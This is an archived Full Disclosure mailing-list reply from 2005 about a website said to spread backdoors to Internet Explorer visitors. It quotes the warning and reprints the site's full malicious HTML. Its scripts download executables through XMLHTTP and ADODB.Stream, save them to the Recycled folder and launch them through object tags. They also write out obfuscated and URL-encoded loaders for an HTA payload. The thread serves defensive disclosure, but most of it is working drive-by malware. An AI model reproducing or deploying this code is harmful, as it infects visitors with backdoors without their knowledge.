Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: http://molecularmultimedia.com/ an exploit distribution point
From: Justin Allen <jallen () logicaldevelopments com au>
Date: Tue, 04 Oct 2005 12:25:32 +0800

Wouldn't this only work on non-SP2 versions of Internet Explorer?

Aditya Deshmukh wrote:

ALERT do not visit with internet explorer http://molecularmultimedia.com/

It attemps to download 2 backdoors - anyone want to inform them ?

The homepage is a script
('ADODB.Stream');o.Mode=3;o.Type=1;o.Open();o.Write(b.responseBody);o.SaveTo
File(d,2)

Full script in the attachment...

________________________________________________________________________
Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)

------------------------------------------------------------------------

<html><head>
<title>Empty</title>
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
<script>function s() {return true;}
window.onerror=s;var d="C:\\Recycled\\Q330995.exe";
try{
b=new ActiveXObject("Microsoft.XMLHTTP");b.Open("GET","kav.exe",0);b.Send();o=new 
ActiveXObject('ADODB.Stream');o.Mode=3;o.Type=1;o.Open();o.Write(b.responseBody);o.SaveToFile(d,2);
}catch(e){};
try{document.write("<object classid=clsid:11311111-1111-1111-1111-111111111157 codebase='"+d+"' style=display:none>");}catch(e){document.write("<object 
classid=clsid:10000000-1000-0000-10000-000300000001 codebase='"+d+"' style=display:none></object>");}</script><object classid=clsid:10003000-1000-0000-10000-000000000001 
codebase=kav.exe></object>
<script>
d="C:\\Recycled\\Q33099.exe";
try{
b=new ActiveXObject("Microsoft.XMLHTTP");b.Open("GET","kav1.exe",0);b.Send();o=new 
ActiveXObject('ADODB.Stream');o.Mode=3;o.Type=1;o.Open();o.Write(b.responseBody);o.SaveToFile(d,2);
}catch(e){};
try{document.write("<object classid=clsid:11311111-1111-1111-1111-111111111157 codebase='"+d+"' style=display:none>");}catch(e){document.write("<object 
classid=clsid:10000000-1000-0000-10000-000300000001 codebase='"+d+"' style=display:none></object>");}</script><object classid=clsid:10003000-1000-0000-10000-000000000001 
codebase=kav1.exe></object>
</head>
<!--LiveInternet counter--><script language="JavaScript"><!--
document.write('<a href="http://www.liveinternet.ru/click"; '+
'target=_blank><img src="http://counter.yadro.ru/hit?t38.6;r'+
escape(document.referrer)+((typeof(screen)=='undefined')?'':
';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+';u'+escape(document.URL)+
';'+Math.random()+
'" border=0 width=0 height=0 title="liveinternet.ru"></a>')//--></script><!--/LiveInternet-->
<script>

var 
hr=location.href,st='',k='',s='',b='cgabbfbbgbcbbaibabcgccdfbcacfaceecdfbcacfbbcdbbcbbbbbfbafbbgbafbbbbbacficjhcjibbfbbbbaibbhbbgbabcfjbaibabbacbbgcficefcejceiceiceicfjbcfcgacehbbfbbgbcbbaibabcgccgachjcggchecgjcghciecdcbafbaacgbbcacfacdccjjbaicjhbbfbbfbafbaacgbcjjbaibbfbafbaacficjhbaacjicfgcfgceicjhcfecefbaacfgbacbaccefcejcejcjjbaccefcfhcfbcffcffcefceiceicjhcjhceiceicfbcjicffcjhcejcejcgccgaciacgfciccgfchhcdcchicgfchhcgjcgbcdecghbbbbajbajcjhbbabaacdecdccigcgfchgcifcgjcgbcdecicbabbaicjhbbgbabbaacdcciebbbbbcbafcjjbbfcdecgccgaciacgfciccgfchhcdcchicgfchhcgjcgbcdecggbbhbbgbbgbbbbbacdecdccigcgfchgcifcgjcgbcdeciebabbcabbgcficdecgccgaciacgfciccgfchhcdcchicgfchhcgjcgbcdecihbafbbabaabbbbbjcdecdccigcgfchgcifcgjcgbcdecdgbadbaibbbcjicjhbaicjfcjibaicjhbbabahcdecgccgabbccjhbbecjhbajcdcbbacjhbajbabcgbcdecidcjjbbebbbbaibaicjicjhbbebbfcdecdcbbicjhbaibbhbabcgbcdebbgbbebbhbabcdecgccgaciacgfciccgfchhcdcchicgfchhcgjcgbcdechdbbgbabbajcejcdecdccigcgfchgcifcgjcgbcdecjjbbbbajbajcjhbbabaacfjbajbbfcefbafbbgbbfcfibafcjjbbjbaabafcjhbaicegcjjbaebajcficficehbafcjjbbjcjfbbbbbibabbbebbibafbabbbjcegbaebbgbajcdecgccgacehchjcggchecgjcghciecgccgabbfcjjbbebafbbcbbgcgcbcacfacegchcchccghbaibafcjjbahceacebcfjbbjbafbbabaabbbbbjcegbbbbbcbabbbababbbecegbacbbbcjjbbhbbfceacebcfjcgacehbbfcjjbbebafbbcbbgcgccgachjcggchecgjcghciecdcbafbaacgbbcacfbcdccjjbaicjhbbfbbfbafbaacgbcjjbaibbfbafbaacficjhbaacjicfgcfgceicjhcfecefbaacfgbacbaccefcejcejcjjbaccefcfhcfbcffcffcefceiceicjhcjhceiceicfbcjicffcjhcejcejcgccgaciacgfciccgfchhcdcchicgfchhcgjcgbcdecghbbbbajbajcjhbbabaacdecdccigcgfchgcifcgjcgbcdecicbabbaicjhbbgbabbaacdcciebbbbbcbafcjjbbfcdecgccgaciacgfciccgfchhcdcchicgfchhcgjcgbcdecggbbhbbgbbgbbbbbacdecdccigcgfchgcifcgjcgbcdeciebabbcabbgcficdecgccgaciacgfciccgfchhcdcchicgfchhcgjcgbcdecihbafbbabaabbbbbjcdecdccigcgfchgcifcgjcgbcdecdgbadbaibbbcjicjhbaicjfcjibaicjhbbabahcdecgccgaciacgfciccgfchhcdcchicgfchhcgjcgbcdechdbbgbabbajcejcdecdccigcgfchgcifcgjcgbcdecjjbbbbajbajcjhbbabaacfjbagcjhbbicjhbbfcjjbbebafbbcbbgcfibaabbbcjjbbhbajbabbbabbgcegbaibafbbabahbbfcjbceicjdcegbaebbebabbaccgbcdjcgjciicgjcghcgbceebajbbfbaebbgcjhceecdhcdccdccghchcchhcgbbafbabbbfbaecjhbbebabbaacegcjjbaebajcdcchachdchgcgjcgbcjhbbcbbccjfbafbbabbfbbgcjhbaibaicegbaebbgbajcdjcdhcfbcggbaabbbcjjbbhbajbabbbabbgcegbaibafbbabahbbfcjbceicjdcegcjjbaibafcjjbahceacebcfjcdecgccgacehchjcggchecgjcghciecgccgabbfcjjbbebafbbcbbgcgcbbfbabbbgciebafbajbabbbbbbhbbgceacdjbcacfbcegchcchccghbaibafcjjbahceacebcfjcdjceecejceiceiceicebcfjbbfbabbbgciebafbajbabbbbbbhbbgceacdjbbjbafbbabaabbbbbjcegcjjbaibbbbbfbabceacebcfjcdjceecejcfaceiceicebcfjcgacehbbfcjjbbebafbbcbbgcgc';

for(i=0;i<b.length;i++)
{
 s+=b.slice(i,i+1).charCodeAt(0)-97;
};

for(j=0;j<String(s).length;j+=3)
{
 k=parseInt(String(s).slice(j,j+3));
 if(k>200){k-=200;}
 st+=String.fromCharCode(k);
};

document.write(st.replace('%',hr.substring(0,hr.lastIndexOf('/')) +'/web.hta'));
</script>
<SCRIPT LANGUAGE="Javascript">
var 
pe="%20%20%20%20%20%3C%48%45%41%44%3E%3C%4D%45%54%41%20%48%54%54%50%2D%45%51%55%49%56%3D%22%45%78%70%69%72%65%73%22%20%43%4F%4E%54%45%4E%54%3D%22%2D%31%22%3E%0A%20%3C%2F%48%45%41%44%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0D%0A%3C%74%65%78%74%61%72%65%61%20%69%64%3D%22%63%6F%64%65%32%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%3E%0D%0A%74%3E%65%63%62%6A%2F%6F%3E%3C%74%22%6C%65%70%74%72%69%73%63%78%2D%74%2F%65%78%22%74%65%3D%79%70%20%74%6D%22%68%74%63%2E%78%65%2F%65%3A%3A%68%6D%2E%63%2F%78%43}%53%52%24{%74%21%6D%68%6F%2E%0C%6F%64%3A%2F%2F%65%3A%69%6C%3A%66%6D%6C%68%74%3A%6D%74%73%2D%69%6D%73%3D%22%74%61%64%61%74%20%65%63%62%6A%3C%6F%0D%0A%3C%2F%74%65%78%74%61%72%65%61%3E%0D%0A%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%20%20%20%20%66%75%6E%63%74%69%6F%6E%20%64%65%63%72%79%70%74%28%79%29{%0D%0A%20%20%20%20%20%20%20%20%76%61%72%20%69%0D%0A%20%20%20%20%20%20%20%20%76%61%72%20%74%32%3D%22%22%0D%0A%20%20%20%20%20%20%20%20%66%6F%72%28%69%3D%28%79%2E%6C%65%6E%67%74%68%2B%31%29%3B%69%3E%3D%30%3B%69%2D%2D%29{%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%74%32%2B%3D%79%2E%63%68%61%72%41%74%28%69%29%0D%0A%20%20%20%20%20%20%20%20}%0D%0A%20%20%20%20%20%20%20%20%76%61%72%20%74%31%3D%22%22%0D%0A%20%20%20%20%20%20%20%20%66%6F%72%28%69%3D%30%3B%69%3C%28%74%32%2E%6C%65%6E%67%74%68%2B%31%29%3B%69%2B%2B%29{%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%74%31%2B%3D%74%32%2E%63%68%61%72%41%74%28%69%2B%31%29%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%74%31%2B%3D%74%32%2E%63%68%61%72%41%74%28%69%29%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%69%2B%3D%31%3B%0D%0A%20%20%20%20%20%20%20%20}%0D%0A%20%20%20%20%20%20%20%20%72%65%74%75%72%6E%20%74%31%3B%0D%0A%20%20%20%20}%0D%0A%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%63%6F%64%65%32%2E%76%61%6C%75%65%3D%64%65%63%72%79%70%74%28%63%6F%64%65%32%2E%76%61%6C%75%65%29%29%0D%0A%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%63%6F%64%65%32%2E%76%61%6C%75%65%2E%72%65%70%6C%61%63%65%28%2F%5C%24{%53%52%43}%2F%67%2C%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%2E%73%75%62%73%74%72%69%6E%67%28%30%2C%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%2E%6C%61%73%74%49%6E%64%65%78%4F%66%28%27%2F%27%29%29%29%29%3B%0D%0A%3C%2F%73%63%72%69%70%74%3E%0D%0A"
document.write(unescape(pe))
</script>
<SCRIPT LANGUAGE="Javascript">
var 
hash="%20%20%20%20%20%3C%48%45%41%44%3E%3C%4D%45%54%41%20%48%54%54%50%2D%45%51%55%49%56%3D%22%45%78%70%69%72%65%73%22%20%43%4F%4E%54%45%4E%54%3D%22%2D%31%22%3E%0A%20%3C%2F%48%45%41%44%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0D%0A%3C%74%65%78%74%61%72%65%61%20%69%64%3D%22%63%6F%64%65%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%3B%22%3E%0D%0A%74%3E%65%63%62%6A%2F%6F%3E%3C%74%22%6C%65%70%74%72%69%73%63%78%2D%74%2F%65%78%22%74%65%3D%79%70%20%74%6D%22%68%74%78%2E%3A%2F%6D%3A%63%68%78%2E}%2F%54%48%50%41%24{%74%21%6D%68%6F%2E%20%6F%64%3A%2F%2F%65%3A%69%6C%3A%66%6D%6C%68%74%3A%6D%74%73%2D%69%6D%73%3D%22%74%61%64%61%74%20%65%63%62%6A%3C%6F%0D%0A%3C%2F%74%65%78%74%61%72%65%61%3E%0D%0A%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%20%20%20%20%66%75%6E%63%74%69%6F%6E%20%64%65%63%72%79%70%74%28%73%29{%0D%0A%20%20%20%20%20%20%20%20%76%61%72%20%69%0D%0A%20%20%20%20%20%20%20%20%76%61%72%20%74%32%3D%22%22%0D%0A%20%20%20%20%20%20%20%20%66%6F%72%28%69%3D%28%73%2E%6C%65%6E%67%74%68%2B%31%29%3B%69%3E%3D%30%3B%69%2D%2D%29{%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%74%32%2B%3D%73%2E%63%68%61%72%41%74%28%69%29%0D%0A%20%20%20%20%20%20%20%20}%0D%0A%20%20%20%20%20%20%20%20%76%61%72%20%74%31%3D%22%22%0D%0A%20%20%20%20%20%20%20%20%66%6F%72%28%69%3D%30%3B%69%3C%28%74%32%2E%6C%65%6E%67%74%68%2B%31%29%3B%69%2B%2B%29{%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%74%31%2B%3D%74%32%2E%63%68%61%72%41%74%28%69%2B%31%29%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%74%31%2B%3D%74%32%2E%63%68%61%72%41%74%28%69%29%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%69%2B%3D%31%3B%0D%0A%20%20%20%20%20%20%20%20}%0D%0A%20%20%20%20%20%20%20%20%72%65%74%75%72%6E%20%74%31%3B%0D%0A%20%20%20%20}%0D%0A%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%63%6F%64%65%2E%76%61%6C%75%65%3D%64%65%63%72%79%70%74%28%63%6F%64%65%2E%76%61%6C%75%65%29%29%0D%0A%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%63%6F%64%65%2E%76%61%6C%75%65%2E%72%65%70%6C%61%63%65%28%2F%5C%24{%50%41%54%48}%2F%67%2C%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%2E%73%75%62%73%74%72%69%6E%67%28%30%2C%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%2E%6C%61%73%74%49%6E%64%65%78%4F%66%28%27%2F%27%29%29%29%29%3B%0D%0A%3C%2F%73%63%72%69%70%74%3E%0D%0A"
document.write(unescape(hash))

</script>
</body>
</html>

________________________________________________________________________
Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)

------------------------------------------------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



--
<pre>Justin Allen
Software Developer
Logical Developments
Phone: +61 8 9458 3889</pre>


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault